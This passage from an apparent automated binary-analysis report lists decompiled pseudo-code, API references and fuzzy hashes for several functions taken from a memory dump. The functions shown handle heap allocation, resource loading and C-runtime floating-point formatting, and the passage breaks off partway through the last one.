0x00ce3c95
0x00ce3c6b
0x00ce3c70
0x00ce3c71
0x00ce3c73
0x00000000
0x00000000
0x00ce3c73
0x00000000
0x00ce3c75
0x00ce3c4e
0x00ce3c54
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CE5AB8,00000001,00000364,00000006,000000FF,?,00CDC0C9,00CB10CE), ref: 00CE3C7E

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 776598963456a2a785c350997e393dcf438ff0c4e0a1d003511a4b5b0fbabb79
Instruction ID: c19165093f8dee53c9330ef69b95861f92f6fe75df0212b56b465e662362401b
Opcode Fuzzy Hash: 776598963456a2a785c350997e393dcf438ff0c4e0a1d003511a4b5b0fbabb79
Instruction Fuzzy Hash: BAF0E9316042E476DB215A639D0DB6E3B58AF41760B359315FC15BB190CB70FF4196E0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00CBC9B1, Relevance: 12.1, APIs: 8, Instructions: 73
memoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00CBC9B1(void* __edi) {
				intOrPtr _t2;
				void* _t6;
				void* _t12;
				void* _t15;
				void _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t20;

				_t15 = __edi;
				_t2 =  *0xe390f0; // 0x0
				if(_t2 != 0) {
					L3:
					if(_t2 != 1) {
						__imp__InterlockedPopEntrySList(_t2);
						_t19 = _t2;
						if(_t19 == 0) {
							_t20 = VirtualAlloc(0, 0x1000, 0x1000, 0x40);
							if(_t20 != 0) {
								__imp__InterlockedPopEntrySList( *0xe390f0, _t15);
								_t16 =  *_t20;
								if(_t16 == 0) {
									_t1 = _t20 + 0xff0; // 0xff0
									_t17 = _t1;
									do {
										__imp__InterlockedPushEntrySList( *0xe390f0, _t20);
										_t20 = _t20 + 0x10;
									} while (_t20 < _t17);
									_t6 = _t20;
									L15:
									return _t6;
								}
								VirtualFree(_t20, 0, 0x8000);
								_t6 = _t16;
								goto L15;
							}
							L9:
							RaiseException(0xc0000017, 0, 0, 0);
							return 0;
						}
						E00CC1E00(_t15, _t19, 0, 0xd);
						return _t19;
					}
					_t12 = HeapAlloc(GetProcessHeap(), 8, 0xd);
					if(_t12 == 0) {
						goto L9;
					}
					return _t12;
				}
				if(E00CBCAC7() == 0) {
					goto L9;
				}
				_t2 =  *0xe390f0; // 0x0
				goto L3;
			}

0x00cbc9b1
0x00cbc9b1
0x00cbc9bc
0x00cbc9cc
0x00cbc9cf
0x00cbc9ec
0x00cbc9f2
0x00cbc9f6
0x00cbca19
0x00cbca1d
0x00cbca3a
0x00cbca40
0x00cbca44
0x00cbca57
0x00cbca57
0x00cbca5d
0x00cbca64
0x00cbca6a
0x00cbca6d
0x00cbca71
0x00cbca73
0x00000000
0x00cbca73
0x00cbca4d
0x00cbca53
0x00000000
0x00cbca53
0x00cbca1f
0x00cbca27
0x00000000
0x00cbca2d
0x00cbc9fd
0x00000000
0x00cbca05
0x00cbc9dc
0x00cbc9e4
0x00000000
0x00000000
0x00000000
0x00cbc9e4
0x00cbc9c5
0x00000000
0x00000000
0x00cbc9c7
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00CBCB7A,?,?,00CB5090), ref: 00CBC9D5
HeapAlloc.KERNEL32(00000000,?,00CBCB7A,?,?,00CB5090), ref: 00CBC9DC

Part of subcall function 00CBCAC7: IsProcessorFeaturePresent.KERNEL32(0000000C,00CBC9C3,00000000,?,00CBCB7A,?,?,00CB5090), ref: 00CBCAC9

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00CBCB7A,?,?,00CB5090), ref: 00CBC9EC
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00CBCB7A,?,?,00CB5090), ref: 00CBCA13
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,00CBCB7A,?,?,00CB5090), ref: 00CBCA27
InterlockedPopEntrySList.KERNEL32(00000000,?,00CBCB7A,?,?,00CB5090), ref: 00CBCA3A
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00CBCB7A,?,?,00CB5090), ref: 00CBCA4D

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: 6b52667be8fb88781b3603da5901160479aa15bfe9d46557c5e20874eb3d03a5
Instruction ID: 45e4fde9f8e0f45861bb856f1e642d89049e5d918e1f4b86b3bc9a38ccf3dc10
Opcode Fuzzy Hash: 6b52667be8fb88781b3603da5901160479aa15bfe9d46557c5e20874eb3d03a5
Instruction Fuzzy Hash: 1C11EF7164061AABE72197769CCCFBB3A6DFB05780F150420FA12E7160EB60CD04EAE5

Uniqueness

Uniqueness Score: -1.00%

Function 00CB2C5D, Relevance: 10.7, APIs: 7, Instructions: 153
libraryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00CB2C5D(void* __ebx, intOrPtr __ecx, void* __edx, struct HINSTANCE__* __edi, void* __eflags) {
				CHAR* _t50;
				void* _t53;
				struct HINSTANCE__* _t57;
				void* _t58;
				intOrPtr _t59;
				CHAR* _t60;
				struct HRSRC__* _t62;
				struct HINSTANCE__* _t63;
				void* _t64;
				CHAR* _t69;
				struct HINSTANCE__* _t74;
				void* _t79;
				intOrPtr _t80;
				char* _t88;
				struct HINSTANCE__* _t102;
				void* _t103;
				void* _t104;
				intOrPtr _t106;

				_t101 = __edi;
				_t80 = __ecx;
				_push(0x428);
				E00CFBF9C(0xcfca8d, __ebx, __edi);
				_t50 =  *(_t103 + 8);
				_t79 = 0;
				_t102 = 0;
				 *(_t103 - 0x41c) = _t50;
				 *(_t103 - 0x428) =  *(_t103 + 0x10);
				 *(_t103 - 0x424) = 0;
				 *((intOrPtr*)(_t103 - 4)) = 0;
				 *((intOrPtr*)(_t103 - 0x430)) = _t80;
				 *((intOrPtr*)(_t103 - 0x434)) = 0;
				 *(_t103 - 0x418) = 0;
				 *((char*)(_t103 - 4)) = 1;
				if(_t50 == 0) {
					L27:
					__eflags = _t79 - _t103 - 0x414;
					if(_t79 != _t103 - 0x414) {
						E00CBA3DC(_t103 - 0x418);
					}
					while(1) {
						__eflags = _t102;
						if(_t102 == 0) {
							break;
						}
						_t102 = _t102->i;
						E00CDC163(_t102);
					}
					_t53 = 0x8007000e;
					L32:
					return E00CFBEE9(_t53, _t79, _t101);
				}
				_t57 = E00CDCACF(_t50) + 1;
				_t98 = _t57;
				 *(_t103 - 0x420) = _t57;
				_t58 = E00CB1160(_t103 - 0x420, _t57);
				_t106 = _t104 + 4;
				if(_t58 < 0) {
					L26:
					_t79 =  *(_t103 - 0x418);
					goto L27;
				}
				_t101 =  *(_t103 - 0x420);
				_t110 = _t101 - 0x400;
				if(_t101 > 0x400 || E00CB11E1(_t101, _t110) == 0) {
					_t59 = E00CB9AD3(_t103 - 0x424, _t98, __eflags, _t101);
					_t102 =  *(_t103 - 0x424);
				} else {
					E00CBEB70();
					 *((intOrPtr*)(_t103 - 0x10)) = _t106;
					_t59 = _t106;
				}
				_t60 = E00CB1288(_t59,  *(_t103 - 0x41c), _t101, 3);
				 *(_t103 - 0x41c) = _t60;
				if(_t60 == 0) {
					goto L26;
				} else {
					_t101 = LoadLibraryExA(_t60, _t79, 0x60);
					 *(_t103 - 0x420) = _t101;
					if(_t101 != 0) {
						L10:
						_t62 = FindResourceA(_t101, 0x66,  *(_t103 - 0x428));
						 *(_t103 - 0x428) = _t62;
						__eflags = _t62;
						if(_t62 != 0) {
							_t63 = LoadResource(_t101, _t62);
							 *(_t103 - 0x42c) = _t63;
							__eflags = _t63;
							if(_t63 == 0) {
								goto L11;
							}
							_t69 = SizeofResource(_t101,  *(_t103 - 0x428));
							 *(_t103 - 0x41c) = _t69;
							_t27 =  &(_t69[1]); // 0x1
							_t88 = _t27;
							__eflags = _t88 - _t69;
							if(_t88 >= _t69) {
								 *((char*)(_t103 - 4)) = 2;
								E00CB97C3(_t103 - 0x418, _t88);
								 *((intOrPtr*)(_t103 - 4)) = 1;
								__eflags =  *(_t103 - 0x418);
								if( *(_t103 - 0x418) == 0) {
									goto L14;
								} else {
									L00CB1482( *(_t103 - 0x42c),  *(_t103 - 0x41c));
									 *( *(_t103 - 0x418) +  *(_t103 - 0x41c)) = _t79;
									_t64 = E00CB39CA(_t79, _t103 - 0x434,  *(_t103 - 0x41c), _t101, _t102, __eflags,  *(_t103 - 0x418),  *((intOrPtr*)(_t103 + 0x14)));
									L18:
									_t79 = _t64;
									L19:
									__eflags = _t101;
									if(_t101 != 0) {
										FreeLibrary(_t101);
									}
									L21:
									if( *(_t103 - 0x418) != _t103 - 0x414) {
										E00CBA3DC(_t103 - 0x418);
									}
									while(_t102 != 0) {
										_t102 = _t102->i;
										E00CDC163(_t102);
									}
									_t53 = _t79;
									goto L32;
								}
							}
							L14:
							_t79 = 0x8007000e;
							goto L19;
						}
						L11:
						_t64 = E00CB15CD();
						goto L18;
					}
					_t74 = LoadLibraryExA( *(_t103 - 0x41c), _t79, 2);
					_t101 = _t74;
					 *(_t103 - 0x420) = _t74;
					if(_t101 != 0) {
						goto L10;
					} else {
						_t79 = E00CB15CD();
						goto L21;
					}
				}
			}

0x00cb2c5d
0x00cb2c5d
0x00cb2c5d
0x00cb2c67
0x00cb2c6c
0x00cb2c6f
0x00cb2c74
0x00cb2c76
0x00cb2c7c
0x00cb2c82
0x00cb2c88
0x00cb2c8b
0x00cb2c91
0x00cb2c97
0x00cb2c9d
0x00cb2ca3
0x00cb2e73
0x00cb2e79
0x00cb2e7b
0x00cb2e83
0x00cb2e83
0x00cb2e93
0x00cb2e93
0x00cb2e95
0x00000000
0x00000000
0x00cb2e8b
0x00cb2e8d
0x00cb2e92
0x00cb2e97
0x00cb2e9c
0x00cb2ea7
0x00cb2ea7
0x00cb2caf
0x00cb2cb6
0x00cb2cb8
0x00cb2cbe
0x00cb2cc3
0x00cb2cc8
0x00cb2e6d
0x00cb2e6d
0x00000000
0x00cb2e6d
0x00cb2cce
0x00cb2cd4
0x00cb2cda
0x00cb2cfc
0x00cb2d01
0x00cb2ce7
0x00cb2ce9
0x00cb2cee
0x00cb2cf1
0x00cb2cf1
0x00cb2d12
0x00cb2d17
0x00cb2d1f
0x00000000
0x00cb2d25
0x00cb2d2f
0x00cb2d31
0x00cb2d39
0x00cb2d62
0x00cb2d6b
0x00cb2d71
0x00cb2d77
0x00cb2d79
0x00cb2d87
0x00cb2d8d
0x00cb2d93
0x00cb2d95
0x00000000
0x00000000
0x00cb2d9e
0x00cb2da4
0x00cb2daa
0x00cb2daa
0x00cb2dad
0x00cb2daf
0x00cb2dbf
0x00cb2dc3
0x00cb2dc8
0x00cb2dec
0x00cb2df3
0x00000000
0x00cb2df5
0x00cb2e0a
0x00cb2e20
0x00cb2e2f
0x00cb2e34
0x00cb2e34
0x00cb2e36
0x00cb2e36
0x00cb2e38
0x00cb2e3b
0x00cb2e3b
0x00cb2e41
0x00cb2e4d
0x00cb2e55
0x00cb2e55
0x00cb2e65
0x00cb2e5d
0x00cb2e5f
0x00cb2e64
0x00cb2e69
0x00000000
0x00cb2e69
0x00cb2df3
0x00cb2db1
0x00cb2db1
0x00000000
0x00cb2db1
0x00cb2d7b
0x00cb2d7b
0x00000000
0x00cb2d7b
0x00cb2d44
0x00cb2d4a
0x00cb2d4c
0x00cb2d54
0x00000000
0x00cb2d56
0x00cb2d5b
0x00000000
0x00cb2d5b
0x00cb2d54

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00CB2C67
LoadLibraryExA.KERNEL32(00000000,00000000,00000060,?,?,?), ref: 00CB2D29
LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 00CB2D44
FindResourceA.KERNEL32(00000000,00000066,?), ref: 00CB2D6B
LoadResource.KERNEL32(00000000,00000000), ref: 00CB2D87
SizeofResource.KERNEL32(00000000,?), ref: 00CB2D9E

Part of subcall function 00CB39CA: CoTaskMemFree.OLE32(00000000,?,?,00000000), ref: 00CB3AEF

FreeLibrary.KERNEL32(00000000), ref: 00CB2E3B

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoadResource$Free$FindH_prolog3_catch_SizeofTask
String ID:
API String ID: 3726194016-0
Opcode ID: 7b9844e930650a3f83690fc5e6e92f2109489bda4b47d494878720b39593e86c
Instruction ID: 46ebce998713962bff8a0b1f8c0448aa049c261a8492a3f850ce9fe68f752714
Opcode Fuzzy Hash: 7b9844e930650a3f83690fc5e6e92f2109489bda4b47d494878720b39593e86c
Instruction Fuzzy Hash: D85151B1A001298BCF219F25CC95BEEB7B5AF48301F5440E9EA09A7251DB309FC5DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00CF26B6, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1343
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E00CF26B6(void* __ebx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v0;
				signed int _v8;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1868;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				signed int _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				intOrPtr _v1916;
				signed int _v1920;
				intOrPtr* _v1924;
				signed int _v1928;
				char _v1936;
				signed int _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2424;
				void* __edi;
				signed int _t724;
				intOrPtr _t734;
				signed int _t738;
				signed int _t739;
				intOrPtr _t745;
				intOrPtr* _t746;
				intOrPtr* _t749;
				signed int _t754;
				signed int _t755;
				signed int _t761;
				intOrPtr _t768;
				void* _t769;
				unsigned int* _t771;
				signed int _t780;
				signed int _t781;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t801;
				signed int _t802;
				signed int _t807;
				signed int _t808;
				signed int _t811;
				signed int _t815;
				signed int _t822;
				signed int* _t825;
				signed int _t828;
				signed int _t839;
				signed int _t840;
				signed int _t841;
				signed int _t842;
				char* _t843;
				signed int _t845;
				signed int _t850;
				signed int _t852;
				signed int _t856;
				signed int _t859;
				signed int _t867;
				signed int _t870;
				signed int _t872;
				signed int _t875;
				signed int _t876;
				signed int _t879;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				char* _t896;
				signed int _t898;
				signed int* _t901;
				signed int _t903;
				signed int _t905;
				signed int _t909;
				signed int _t912;
				signed int _t919;
				signed int _t922;
				signed int _t926;
				intOrPtr _t930;
				void* _t931;
				unsigned int* _t933;
				unsigned int _t943;
				signed int _t944;
				void* _t947;
				signed int _t948;
				void* _t950;
				signed int _t961;
				signed int _t963;
				unsigned int _t968;
				signed int _t969;
				void* _t972;
				signed int _t973;
				void* _t975;
				signed int _t979;
				signed int _t983;
				signed int _t985;
				void* _t992;
				signed int _t993;
				signed int _t995;
				signed int _t998;
				void* _t1002;
				signed int _t1003;
				signed int _t1005;
				signed int _t1007;
				signed int _t1009;
				signed int _t1010;
				signed int _t1011;
				signed int _t1012;
				intOrPtr* _t1025;
				signed int _t1034;
				signed int _t1035;
				signed int _t1038;
				signed int _t1039;
				signed int _t1041;
				signed int _t1042;
				signed int _t1043;
				signed int _t1047;
				signed int _t1051;
				signed int _t1052;
				signed int _t1053;
				signed int _t1055;
				signed int _t1056;
				signed int _t1057;
				signed int _t1058;
				signed int _t1059;
				signed int _t1060;
				signed int _t1061;
				signed int _t1063;
				signed int _t1064;
				signed int _t1065;
				signed int _t1066;
				signed int _t1067;
				void* _t1068;
				signed int _t1069;
				intOrPtr _t1073;
				signed int _t1074;
				signed int _t1075;
				signed int _t1080;
				void* _t1081;
				intOrPtr _t1084;
				signed int _t1085;
				signed int _t1088;
				signed int _t1093;
				signed int _t1096;
				signed int _t1098;
				unsigned int _t1099;
				char _t1108;
				signed int _t1110;
				signed int _t1111;
				signed int _t1112;
				signed int _t1113;
				signed int _t1114;
				signed int _t1115;
				signed int _t1117;
				signed int _t1119;
				signed int _t1120;
				signed int _t1121;
				signed int _t1122;
				signed int _t1123;
				signed int _t1125;
				unsigned int _t1127;
				signed int _t1132;
				intOrPtr* _t1134;
				signed int _t1136;
				intOrPtr* _t1138;
				intOrPtr _t1141;
				signed int _t1142;
				void* _t1147;
				signed int _t1148;
				unsigned int _t1150;
				signed int _t1151;
				signed int _t1152;
				void* _t1153;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				signed int _t1162;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				signed int _t1168;
				signed int _t1170;
				signed int _t1173;
				signed int _t1174;
				signed int _t1177;
				signed int _t1179;
				signed int _t1180;
				intOrPtr _t1182;
				intOrPtr _t1183;
				signed int _t1186;
				signed int _t1187;
				signed int _t1188;
				unsigned int* _t1189;
				signed int _t1190;
				signed int _t1193;
				signed int _t1194;
				signed int _t1195;
				signed int _t1196;
				signed int _t1198;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				signed int _t1202;
				signed int _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				unsigned int* _t1209;
				signed int _t1210;
				signed int _t1214;
				signed int _t1216;
				signed int _t1218;
				signed int _t1220;
				signed int _t1222;
				signed int _t1226;
				signed int* _t1227;
				signed int* _t1232;
				signed int _t1235;
				signed int _t1242;

				_t992 = __ebx;
				_t1222 = _t1226;
				_t1227 = _t1226 - 0x964;
				_t724 =  *0xd0f014; // 0xbb5e653b
				_v8 = _t724 ^ _t1222;
				_v1924 = _a16;
				_v1904 = _a20;
				E00CF69DB(__eflags,  &_v1944);
				if((_v1944 & 0x0000001f) != 0x1f) {
					E00CF6A45(__eflags,  &_v1944);
					_v1936 = 1;
				} else {
					_v1936 = 0;
				}
				_push(_t992);
				_t993 = _a4;
				_t1179 = _a8;
				_t1141 = 0x20;
				_t1235 = _t1179;
				if(_t1235 > 0 || _t1235 >= 0 && _t993 >= 0) {
					_t734 = _t1141;
				} else {
					_t734 = 0x2d;
				}
				_t1025 = _v1924;
				_t1096 = _v1904;
				 *_t1025 = _t734;
				 *((intOrPtr*)(_t1025 + 8)) = _t1096;
				if((_t1179 & 0x7ff00000) != 0) {
					L12:
					_t738 = E00CE5BD1( &_a4);
					__eflags = _t738;
					if(_t738 != 0) {
						 *(_v1924 + 4) = 1;
					}
					_t739 = _t738 - 1;
					__eflags = _t739;
					if(_t739 == 0) {
						_push("1#INF");
						goto L311;
					} else {
						_t754 = _t739 - 1;
						__eflags = _t754;
						if(_t754 == 0) {
							_push("1#QNAN");
							goto L311;
						} else {
							_t755 = _t754 - 1;
							__eflags = _t755;
							if(_t755 == 0) {
								_push("1#SNAN");
								goto L311;
							} else {
								__eflags = _t755 == 1;
								if(_t755 == 1) {
									_push("1#IND");
									L311:
									_push(_a24);
									_t1029 = _v1904;
									_push(_v1904);
									goto L312;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a8 = _t1179 & 0x7fffffff;
									_a4 = _t993;
									_t1242 = _a4;
									asm("fst qword [ebp-0x778]");
									_t1186 = _v1912;
									_v1920 = _a12 + 1;
									_t1034 = _t1186 >> 0x14;
									_t761 = _t1034 & 0x000007ff;
									__eflags = _t761;
									if(_t761 != 0) {
										_t761 = 0;
										_t995 = 0;
										__eflags = 0;
									} else {
										_t995 = 1;
									}
									_t1187 = _t1186 & 0x000fffff;
									_v1888 = _v1916 + _t761;
									asm("adc esi, edx");
									_t1035 = _t1034 & 0x000007ff;
									_v1868 = _t1035 + _t995;
									E00CF6AA0(_t1035, _t1242);
									_push(_t1035);
									_push(_t1035);
									 *_t1227 = _t1242;
									_t1038 = E00CFC1E0(E00CF6BB0(_t1035, _v1916 + _t761), _t1242);
									_v1900 = _t1038;
									_t1147 = 0x20;
									__eflags = _t1038 - 0x7fffffff;
									if(_t1038 == 0x7fffffff) {
										L23:
										__eflags = 0;
										_v1900 = 0;
									} else {
										__eflags = _t1038 - 0x80000000;
										if(_t1038 == 0x80000000) {
											goto L23;
										}
									}
									_t1098 = _v1868;
									__eflags = _t1187;
									_v468 = _v1888;
									_v464 = _t1187;
									_v936 = _v936 & 0x00000000;
									_t998 = (0 | _t1187 != 0x00000000) + 1;
									_v472 = _t998;
									__eflags = _t1098 - 0x433;
									if(_t1098 < 0x433) {
										__eflags = _t1098 - 0x35;
										if(_t1098 == 0x35) {
											L111:
											_t768 =  *((intOrPtr*)(_t1222 + _t998 * 4 - 0x1d4));
											_t204 =  &_v1912;
											 *_t204 = _v1912 & 0x00000000;
											__eflags =  *_t204;
											asm("bsr eax, eax");
											if( *_t204 == 0) {
												_t769 = 0;
												__eflags = 0;
											} else {
												_t769 = _t768 + 1;
											}
											_t1188 = _t998;
											_t1148 = _t1147 - _t769;
											__eflags = _t1148;
											_v1888 = _t1188;
											_t1039 = _t1188;
											_t771 =  &(( &_v472)[_t1188]);
											_v1884 = _t771;
											_t1189 = _t771;
											while(1) {
												__eflags = _t1039 - _t998;
												if(_t1039 >= _t998) {
													_t215 =  &_v1872;
													 *_t215 = _v1872 & 0x00000000;
													__eflags =  *_t215;
												} else {
													_v1872 =  *(_t1222 + _t1039 * 4 - 0x1d0);
												}
												_t217 = _t1039 - 1; // -1
												__eflags = _t217 - _t998;
												if(_t217 >= _t998) {
													_t1099 = 0;
													__eflags = 0;
												} else {
													_t1099 =  *_t1189;
												}
												_t1189 = _t1189 - 4;
												 *(_t1222 + _t1039 * 4 - 0x1d0) = _t1099 >> 0x0000001f | _v1872 + _v1872;
												_t1039 = _t1039 - 1;
												__eflags = _t1039 - 0xffffffff;
												if(_t1039 == 0xffffffff) {
													break;
												}
												_t998 = _v472;
											}
											_t1190 = _v1888;
											__eflags = _t1148 - 1;
											if(_t1148 >= 1) {
												_v472 = _t1190;
											} else {
												_v472 = _t1190 + 1;
											}
											_t1150 = 0x434 >> 5;
											E00CC1E00(0x434 >> 5,  &_v1396, 0, 0x434);
											__eflags = 1;
											 *(_t1222 + 0xbad63d) = 1 << (0x00000434 - _v1868 & 0x0000001f);
										} else {
											_v1396 = _v1396 & 0x00000000;
											_v1392 = 0x100000;
											_v1400 = 2;
											__eflags = _t1187;
											if(_t1187 != 0) {
												_t1068 = 0;
												__eflags = 0;
												while(1) {
													_t930 =  *((intOrPtr*)(_t1222 + _t1068 - 0x570));
													__eflags = _t930 -  *((intOrPtr*)(_t1222 + _t1068 - 0x1d0));
													if(_t930 !=  *((intOrPtr*)(_t1222 + _t1068 - 0x1d0))) {
														goto L111;
													}
													_t1068 = _t1068 + 4;
													__eflags = _t1068 - 8;
													if(_t1068 != 8) {
														continue;
													} else {
														_t174 =  &_v1912;
														 *_t174 = _v1912 & 0x00000000;
														__eflags =  *_t174;
														asm("bsr eax, esi");
														if( *_t174 == 0) {
															_t931 = 0;
															__eflags = 0;
														} else {
															_t931 = _t930 + 1;
														}
														_t1208 = _t998;
														_t1168 = _t1147 - _t931;
														__eflags = _t1168;
														_v1888 = _t1208;
														_t1069 = _t1208;
														_t933 =  &(( &_v472)[_t1208]);
														_v1884 = _t933;
														_t1209 = _t933;
														while(1) {
															__eflags = _t1069 - _t998;
															if(_t1069 >= _t998) {
																_t185 =  &_v1872;
																 *_t185 = _v1872 & 0x00000000;
																__eflags =  *_t185;
															} else {
																_v1872 =  *(_t1222 + _t1069 * 4 - 0x1d0);
															}
															_t187 = _t1069 - 1; // -1
															__eflags = _t187 - _t998;
															if(_t187 >= _t998) {
																_t1127 = 0;
																__eflags = 0;
															} else {
																_t1127 =  *_t1209;
															}
															_t1209 = _t1209 - 4;
															 *(_t1222 + _t1069 * 4 - 0x1d0) = _t1127 >> 0x0000001e | _v1872 << 0x00000002;
															_t1069 = _t1069 - 1;
															__eflags = _t1069 - 0xffffffff;
															if(_t1069 == 0xffffffff) {
																break;
															}
															_t998 = _v472;
														}
														_t1210 = _v1888;
														__eflags = _t1168 - 2;
														if(_t1168 >= 2) {
															_v472 = _t1210;
														} else {
															_v472 = _t1210 + 1;
														}
														_t1150 = 0x435 >> 5;
														E00CC1E00(0x435 >> 5,  &_v1396, 0, 0x435);
														 *(_t1222 + 0xbad63d) = 1 << (0x00000435 - _v1868 & 0x0000001f);
													}
													goto L127;
												}
											}
											goto L111;
										}
										L127:
										_t780 = _t1150 + 1;
										_t1002 = 0x1cc;
										_v1400 = _t780;
										_v936 = _t780;
										_t781 = _t780 << 2;
										__eflags = _t781;
										_push(_t781);
										_push( &_v1396);
										_push(0x1cc);
										_push( &_v932);
										L316();
										_t1232 =  &(_t1227[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_v1392 = 0x100000;
										_v1400 = 2;
										__eflags = _t1187;
										if(_t1187 == 0) {
											L60:
											_t943 = _t1098 - 0x432;
											_t944 = _t943 & 0x0000001f;
											_t1214 = _t943 >> 5;
											_v1868 = _t944;
											_v1876 = _t1214;
											_v1888 = _t1147 - _t944;
											_t947 = E00CFC1C0(1, _t1147 - _t944, 0);
											_t1073 =  *((intOrPtr*)(_t1222 + _t998 * 4 - 0x1d4));
											_t948 = _t947 - 1;
											_t118 =  &_v1912;
											 *_t118 = _v1912 & 0x00000000;
											__eflags =  *_t118;
											asm("bsr ecx, ecx");
											_v1908 = _t948;
											_v1884 =  !_t948;
											if( *_t118 == 0) {
												_t950 = 0;
												__eflags = 0;
											} else {
												_t950 = _t1073 + 1;
											}
											_t1132 = _t998 + _t1214;
											_t1170 = _t1147 - _t950;
											_v1880 = _t1170;
											_v1892 = _t1132;
											__eflags = _t1132 - 0x73;
											if(_t1132 != 0x73) {
												L66:
												_t1074 = 0;
												__eflags = 0;
											} else {
												__eflags = _v1868 - _t1170;
												if(_v1868 <= _t1170) {
													goto L66;
												} else {
													_t1074 = 1;
												}
											}
											__eflags = _t1132 - 0x73;
											if(_t1132 > 0x73) {
												L88:
												__eflags = 0;
												_t1002 = 0x1cc;
												_push(0);
												_v1400 = 0;
												_v472 = 0;
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L316();
												_t1227 =  &(_t1227[4]);
											} else {
												__eflags = _t1074;
												if(_t1074 != 0) {
													goto L88;
												} else {
													__eflags = _t1132 - 0x72;
													if(_t1132 >= 0x72) {
														_t1132 = 0x72;
														_v1892 = _t1132;
													}
													_t1075 = _t1132;
													_v1896 = _t1075;
													__eflags = _t1132 - 0xffffffff;
													if(_t1132 != 0xffffffff) {
														_t1173 = _v1876;
														_t1216 = _t1132 - _t1173;
														__eflags = _t1216;
														_t1134 =  &_v468 + _t1216 * 4;
														while(1) {
															__eflags = _t1075 - _t1173;
															if(_t1075 < _t1173) {
																break;
															}
															__eflags = _t1216 - _t998;
															if(_t1216 >= _t998) {
																_t961 = 0;
																__eflags = 0;
															} else {
																_t961 =  *_t1134;
															}
															_v1872 = _t961;
															__eflags = _t1216 - 1 - _t998;
															if(_t1216 - 1 >= _t998) {
																_t963 = 0;
																__eflags = 0;
															} else {
																_t963 =  *(_t1134 - 4);
															}
															_t1134 = _t1134 - 4;
															_t1080 = _v1896;
															 *(_t1222 + _t1080 * 4 - 0x1d0) = (_t963 & _v1884) >> _v1888 | (_v1872 & _v1908) << _v1868;
															_t1075 = _t1080 - 1;
															_t1216 = _t1216 - 1;
